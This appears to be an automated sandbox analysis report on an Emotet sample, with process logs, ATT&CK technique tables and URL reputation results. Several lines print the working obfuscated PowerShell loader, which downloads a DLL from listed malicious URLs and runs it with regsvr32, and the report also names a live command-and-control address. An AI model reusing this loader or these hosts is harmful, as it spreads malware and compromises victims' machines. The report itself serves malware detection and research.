                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FFC65CF3280

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCPJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF8900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,16_2_00007FFC65CF8900
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF8860 HeapCreate,GetVersion,HeapSetInformation,16_2_00007FFC65CF8860

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                  Source: svchost.exe, 0000001D.00000002.506359620.00000210415F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
                  Source: svchost.exe, 0000000C.00000002.504391777.0000023BC8A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: svchost.exe, 0000000C.00000002.504488461.0000023BC8B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Files%\Windows Defender\MsMpeng.exe
                  Source: svchost.exe, 0000000C.00000002.504178254.0000023BC8A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.504488461.0000023BC8B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 16.2.regsvr32.exe.28c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.regsvr32.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.regsvr32.exe.c60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.regsvr32.exe.28c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  Exfiltration Over Other Network Medium12
                  Ingress Tool Transfer
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Native API
                  Boot or Logon Initialization Scripts111
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                  Encrypted Channel
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts11
                  Command and Scripting Interpreter
                  Logon Script (Windows)Logon Script (Windows)2
                  Obfuscated Files or Information
                  Security Account Manager25
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                  Non-Standard Port
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local Accounts2
                  PowerShell
                  Logon Script (Mac)Logon Script (Mac)1
                  DLL Side-Loading
                  NTDS1
                  Query Registry
                  Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Non-Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script31
                  Masquerading
                  LSA Secrets251
                  Security Software Discovery
                  SSHKeyloggingData Transfer Size Limits22
                  Application Layer Protocol
                  Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common131
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials131
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                  Process Injection
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  Hidden Files and Directories
                  Proc Filesystem1
                  Application Window Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                  Regsvr32
                  /etc/passwd and /etc/shadow1
                  Remote System Discovery
                  Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 631940 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 56 Multi AV Scanner detection for domain / URL 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 4 other signatures 2->62 9 cmd.exe 1 2->9         started        12 svchost.exe 2->12         started        14 svchost.exe 2->14         started        16 11 other processes 2->16 process3 dnsIp4 68 Suspicious powershell command line found 9->68 19 powershell.exe 15 20 9->19         started        24 conhost.exe 9->24         started        70 Changes security center settings (notifications, updates, antivirus, firewall) 12->70 26 MpCmdRun.exe 1 12->26         started        72 Query firmware table information (likely to detect VMs) 14->72 44 127.0.0.1 unknown unknown 16->44 signatures5 process6 dnsIp7 46 jsonsintl.com 98.142.105.106, 49741, 80 DIMENOCUS United States 19->46 48 www.jsonsintl.com 19->48 50 192.168.2.1 unknown unknown 19->50 42 C:\Users\user\AppData\...\IKdzfJtQpj.BCP, PE32+ 19->42 dropped 64 Powershell drops PE file 19->64 28 regsvr32.exe 19->28         started        30 conhost.exe 26->30         started        file8 signatures9 process10 process11 32 regsvr32.exe 5 28->32         started        file12 40 C:\Windows\System32\...\tZBUnLQvw.dll (copy), PE32+ 32->40 dropped 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->54 36 regsvr32.exe 32->36         started        signatures13 process14 dnsIp15 52 173.82.82.196, 49752, 8080 MULTA-ASN1US United States 36->52 66 System process connects to network (likely due to code injection or exploit) 36->66 signatures16

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP40%ReversingLabsWin64.Trojan.Emotet
                  C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)40%ReversingLabsWin64.Trojan.Emotet
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  jsonsintl.com5%VirustotalBrowse
                  www.jsonsintl.com4%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  https://173.82.82.196:8080/temV100%Avira URL Cloudmalware
                  https://contoso.com/License0%URL Reputationsafe
                  http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/14%VirustotalBrowse
                  http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/100%Avira URL Cloudmalware
                  http://jsonsintl.com0%Avira URL Cloudsafe
                  https://173.82.82.196:8080/l100%Avira URL Cloudmalware
                  http://www.jsonsintl.com0%Avira URL Cloudsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://www.pango.co/privacy0%URL Reputationsafe
                  https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                  http://www.jsonsintl.com/0%Avira URL Cloudsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://digitalkitchen.jp/images/PVn/100%Avira URL Cloudmalware
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://173.82.82.196/100%URL Reputationmalware
                  http://crl.ver)0%Avira URL Cloudsafe
                  https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                  http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/100%Avira URL Cloudmalware
                  https://%s.xboxlive.com0%URL Reputationsafe
                  https://173.82.82.196:8080/100%URL Reputationmalware
                  https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                  http://piffl.com/piffl.com/a/100%Avira URL Cloudmalware
                  https://nakharinitwebhosting.com/HSDYKN1X5GLF/100%Avira URL Cloudmalware
                  https://dynamic.t0%URL Reputationsafe
                  https://disneyplus.com/legal.0%URL Reputationsafe
                  http://www.jsonsintl.com40%Avira URL Cloudsafe
                  http://help.disneyplus.com.0%URL Reputationsafe
                  https://%s.dnet.xboxlive.com0%URL Reputationsafe
                  https://173.82.82.196:8080/P100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  jsonsintl.com
                  98.142.105.106
                  truetrueunknown
                  www.jsonsintl.com
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/true
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://173.82.82.196:8080/temVregsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmptrue
                              • 14%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              unknown
                              https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://jsonsintl.compowershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://173.82.82.196:8080/lregsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
